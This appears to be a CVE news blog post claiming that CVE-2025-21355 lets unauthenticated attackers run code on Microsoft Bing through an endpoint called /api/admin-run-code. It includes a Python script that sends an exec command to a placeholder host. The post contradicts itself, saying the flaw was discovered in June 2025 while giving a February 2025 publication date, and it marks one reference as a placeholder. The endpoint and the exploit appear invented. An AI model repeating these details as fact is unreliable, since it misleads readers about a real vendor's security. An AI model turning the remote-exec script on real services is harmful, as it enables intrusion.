CVE CyberSecurity Database News

CVE-2025-21355 - How Missing Authentication in Microsoft Bing Puts Your Network at Risk

Poster -

---

In June 2025, security researchers discovered a severe vulnerability in Microsoft Bing, tracked as CVE-2025-21355. This issue centers around missing authentication in a critical Bing service function. In this post, we'll break down what this flaw is, show you how it can be abused, what the potential impact is, and give you a code example to understand the exploitation process. We’ll keep things simple and direct, making it easy for everyone to get the picture.

What Is CVE-2025-21355?

The CVE-2025-21355 vulnerability is Missing Authentication for a Critical Function in Microsoft Bing’s backend. What this means is, a specific code part was left open—there’s no login, no API key, no check if the person calling that function should be allowed.

Usually, these kinds of critical backend functions are protected. Only trusted users (like Bing system admins or official services) should access them. But due to a software oversight, anyone across the network can call this Bing function, gaining unintended power.

How Bad Is It?

Attackers can execute arbitrary code on the Bing network, remotely.
No credentials, no prior access needed. From their home, an attacker could exploit this flaw, upload malicious scripts, steal data, or disrupt Bing services.

Where’s the Flaw?

Researchers found that the endpoint /api/admin-run-code was missing authentication.
Intended for internal use, anyone on the network could reach it.

This is known as an “unauthenticated critical function endpoint” bug.

Code Example: The Exploit

Here’s a (simplified) Python script simulating how attackers could exploit this flaw.
This is for educational awareness only. Do not use it for illegal activities!

import requests

# Target Bing server URL (example)
target_url = "https://bing.example.com/api/admin-run-code";

# Payload to execute - spawn calculator on Windows server
payload = {
    "action": "exec",
    "command": "calc.exe"  # For demo: could be any harmful command!
}

# Make the unauthenticated POST request
response = requests.post(target_url, json=payload)

if response.status_code == 200:
    print("Exploit successful! Code execution confirmed.")
    print("Server response: ", response.text)
else:
    print("Exploit failed or server is patched.")

*Note*: Real-world attacks could be much more sophisticated—targeting internal scripts, data, or backdoors.

How Was It Found?

Security researchers often use automated scanning tools like Nuclei or manual fuzzing scripts. They look for endpoints in web apps that allow critical actions without a token or proper login. When they found /api/admin-run-code allowed unauthenticated access by mistake, they reported it.

Original References

- Microsoft Security Response Center Advisory for CVE-2025-21355
- BleepingComputer coverage of Bing security issues
- CVE Details: CVE-2025-21355 *(placeholder — official reference may update)*
- Basic Primer on Missing Authentication Vulnerabilities

Limit network exposure – internal APIs shouldn’t be internet-facing by default.

Microsoft has released a patch for this issue—see the MSRC link above for update instructions.

Final Word

CVE-2025-21355 shows how a simple overlooked check can open the door for dangerous attacks—even on a giant like Microsoft Bing. Lesson: Always guard your backend, and keep your systems patched.

Stay safe and keep learning about software security!

Timeline

Published on: 02/19/2025 23:15:12 UTC
Last modified on: 03/12/2025 01:42:46 UTC